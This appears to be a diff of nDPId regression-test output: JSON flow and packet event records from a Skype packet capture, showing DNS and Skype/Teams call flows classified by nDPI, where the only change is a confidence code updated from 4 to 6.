01129{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1431970679028,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431970679028,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISy7gAAEARKHfAqAFcwKgB\/0RcRFwB\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"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1431970679839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970679839,"pkt":"0NQSxnP1PBXCt3IOCABFAABK0kgAAEARJOfAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="} 
-00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1179,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":60413,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431970679839,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970679839,"pkt":"0NQSxnP1PBXCt3IOCABFAABKzS8AAEARKgDAqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1180,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679839,"flow_last_seen":1431970679839,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1431970679839,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64364,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst0.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1431970679995,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970679995,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7shQAAEARfXbAqAEi1cezlTLdnF4AJ7D1e68CWBP9byLKqG9T\/ZSkhpqmfvjcm+3DFpOZwv2yxQ=="} 
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1182,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1431970679995,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970679995,"pkt":"0NQSxnP1PBXCt3IOCABFAAA12TQAAEARDmTAqAEinTg0HTLdnEoAIVxje7ECiU\/XVCamnPFSSydeUAuZRUP3ucHK0w=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1183,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970679995,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1187,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":2,"flow_last_seen":1431970680899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970680899,"pkt":"0NQSxnP1PBXCt3IOCABFAABKn9sAAEARV1TAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1188,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":2,"flow_last_seen":1431970680899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970680899,"pkt":"0NQSxnP1PBXCt3IOCABFAABKCR0AAEAR7hLAqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2XQAAEARDgvAqAEinTg0KzLdnEYALMh9e7MC2jL0tZM0Yzvr0KHAzi3oveeicB3qmta1c4OVExZFkpM\/"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1190,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1sl0AAEARTKHAqAEib91KEjLdgQkAIR6we7UCnzLS60tunXakNuMsocCUgSoxAT5iGw=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1191,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1431970681005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970681005,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/HVAAAEARe03AqAEiQTffDzLdnF4AK6Bke7cC41QXoMCqTrFc3jjyFt76m6sxlqO9wK+EPcEKNtA\/tkI="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1192,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970681005,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.15","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":3,"flow_last_seen":1431970681909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970681909,"pkt":"0NQSxnP1PBXCt3IOCABFAABKnmgAAEARWMfAqAEiwKgBAev9ADUANqf\/XW0BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAAAEAAQ=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":3,"flow_last_seen":1431970681909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1431970681909,"pkt":"0NQSxnP1PBXCt3IOCABFAABKbIIAAEARiq3AqAEiwKgBAftsADUANoJ0c24BAAABAAAAAAAAAzMzNQEwATcBNwEzBHJzdDABcgVza3lwZQNuZXQAABwAAQ=="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3frUAAEARsN7AqAEi1cezkDLdnEkAIwRMe7kCZypNkc74yL7GF7GC5QinylqI\/WPnVsk+"} 
-00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1200,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431970681960,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970681960,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaTkAAEARlaPAqAEib91KKDLdnFkALS1Je7sCEGG8jv3asKVduW1KlINShpl5CYZ6daDh4AHUflFCiwcMag=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1201,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970681960,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970682971,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970682971,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51276,"dst_port":40021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1213,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431970682971,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970682971,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7SRAAEAGAv\/AqAEinTfrkshMnFVVB2sVAAAAALAC\/\/9GzAAAAgQFtAEDAwUBAQgKPjJCqwAAAAAEAgAA"} 